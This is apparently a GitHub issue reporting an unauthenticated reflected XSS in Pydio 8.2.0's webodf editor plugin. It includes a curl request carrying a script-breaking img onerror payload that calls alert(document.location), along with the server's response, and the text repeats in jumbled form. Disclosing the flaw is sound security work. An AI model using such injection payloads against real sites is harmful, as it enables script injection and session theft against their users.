Open mbadici opened 6 years ago
Accessing:
curl -v "https://mypydio/plugins/editor.webodf/frame.php?file=1e8ali%3C/script%3E%3Cimg/src=%27x%27/onerror=alert(document.location)%3E" output:
User-Agent: curl/7.49.1 Accept: / < HTTP/1.1 200 OK < Date: Thu, 12 Jul 2018 15:04:55 GMT < Server: Apache < X-Frame-Options: SAMEORIGIN < Strict-Transport-Security: max-age=15768000; includeSubdomains; < Vary: Accept-Encoding < Content-Length: 965 < Content-Type: text/html; charset=UTF-8 < "); //window.odfcanvas.setEditable(true); /* odfcanvas.odfContainer().save(function(err){ console.log(err); }); */ } window.setTimeout(init, 0); Since the access isn't authenticated should output just a redirect to the login page. My version is 8.2.0
User-Agent: curl/7.49.1 Accept: /
< HTTP/1.1 200 OK < Date: Thu, 12 Jul 2018 15:04:55 GMT < Server: Apache < X-Frame-Options: SAMEORIGIN < Strict-Transport-Security: max-age=15768000; includeSubdomains; < Vary: Accept-Encoding < Content-Length: 965 < Content-Type: text/html; charset=UTF-8 <
Since the access isn't authenticated should output just a redirect to the login page. My version is 8.2.0
Accessing:
curl -v "https://mypydio/plugins/editor.webodf/frame.php?file=1e8ali%3C/script%3E%3Cimg/src=%27x%27/onerror=alert(document.location)%3E" output: